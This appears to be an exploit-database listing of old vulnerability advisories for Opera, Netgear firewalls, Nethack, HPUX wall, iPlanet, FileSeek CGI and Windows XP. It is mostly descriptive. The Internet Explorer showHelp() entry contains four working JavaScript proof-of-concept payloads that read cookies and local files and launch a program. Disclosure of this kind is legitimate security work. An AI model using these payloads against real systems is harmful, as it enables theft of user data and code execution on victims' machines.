Explore all Exploits:

Opera Browser for Win32 Buffer Overflow Vulnerability

The Opera browser for Win32 (and possibly other) systems is prone to a remotely exploitable buffer overflow condition. For security purposes, Opera will display a warning any time a user of the client visits a link containing a username as part of the URI. An excessively long username will trigger a buffer overflow condition related to this security feature that may overwrite the stack frame of the affected function. Attackers may exploit this vulnerability to execute instructions on client systems.

Netgear FM114P Wireless Firewalls Directory Traversal

Netgear FM114P Wireless Firewalls are vulnerable to directory traversal attacks. An unauthenticated user can escape from the /upnp/service directory and retrieve the firewall's configuration file by sending a specially crafted HTTP request to the vulnerable device.

Buffer Overflow in Nethack

By passing an overly large string when invoking nethack, it is possible to corrupt memory. By exploiting this issue it may be possible for an attacker to overwrite values in sensitive areas of memory, resulting in the execution of arbitrary attacker-supplied code. As nethack may be installed setgid 'games' on various systems this may allow an attacker to gain elevated privileges.

HPUX Wall Buffer Overflow Vulnerability

It has been reported that the HPUX wall executable may be prone to a buffer overflow condition. This buffer overflow is alleged to be triggered when an excessive amount of data is redirected into wall as a message intended to be broadcast. It may be possible for remote attackers to corrupt sensitive regions of memory with attacker-supplied values, possibly resulting in execution of arbitrary code.

iPlanet Web Server and Netscape Enterprise Server Buffer Overflow Vulnerability

It has been reported that iPlanet Web Server and Netscape Enterprise Server are prone to a remotely exploitable buffer overflow condition. This is due to insufficient bounds checking when handling HTTP requests. This condition is reportedly triggered when an invalid HTTP 'method name' or URI request is handled by the vulnerable server. It is possible for remote attackers to corrupt sensitive regions of memory with attacker-supplied values, possibly resulting in execution of arbitrary code. Code execution will occur in the security context of the vulnerable web server process.

FileSeek File Disclosure Vulnerability

FileSeek.cgi and FileSeek2.cgi are prone to a file disclosure vulnerability. It is possible for a remote attacker to submit a maliciously crafted web request which is capable of breaking out of the wwwroot directory and browsing arbitrary web-readable files on a host running the vulnerable script.

FileSeek.cgi and FileSeek2.cgi Remote Command Execution Vulnerability

FileSeek.cgi and FileSeek2.cgi do not filter shell metacharacters from web requests. As a result, it is possible for a remote attacker to execute commands on the shell of a host running the vulnerable script. Commands will be executed with the privileges of the webserver process.

Microsoft Internet Explorer showHelp() Function Multiple Vulnerabilities

Microsoft Internet Explorer implements the showHelp() function as a means of displaying help content contained in HTML pages. However, this function is capable of performing too many other actions outside of its intended functionality through pluggable protocols. These actions could include reading files and executing commands on the vulnerable system.

Exploit 1:
// Sandblad advisory #11 - Read your google cookie
showHelp("file:");showHelp("http://www.google.com/");
showHelp("javascript:alert(document.cookie)");

Exploit 2:
// Sandblad advisory #11 - Read the file c:test.txt
showHelp("file:");showHelp("res://shdoclc.dll/about.dlg");
showHelp("javascript:try{c=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){c=new ActiveXObject('Microsoft.XMLHTTP')};c.open('GET','file://c:/test.txt',false);c.send(null);alert(c.responseText)");

Exploit 3:
// Sandblad advisory #11 - Read the file c:test.txt
showHelp("file:");showHelp("file://c:/test.txt");
showHelp("javascript:alert(document.body.innerText)");

Exploit 4:
// Sandblad advisory #11 - Run the very nice game Winmine
showHelp("file:");showHelp("iexplore.chm");showHelp("res:");
showHelp("javascript:location='mk:@MSITStore:C:'");
showHelp("javascript:document.write('<object id=c classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11\u003E<param name=Command value=ShortCut\u003E<param name=Item1 value=,winmine,\u003E</object\u003E');c.Click();");

Microsoft Windows XP Redirector Buffer Overrun Vulnerability

A buffer overrun vulnerability exists in the Microsoft Windows XP Redirector due to improper handling of certain parameters passed to it. If one of these parameters is unusually long, a buffer can be overrun, resulting in either Windows XP crashing or code execution with elevated privileges.
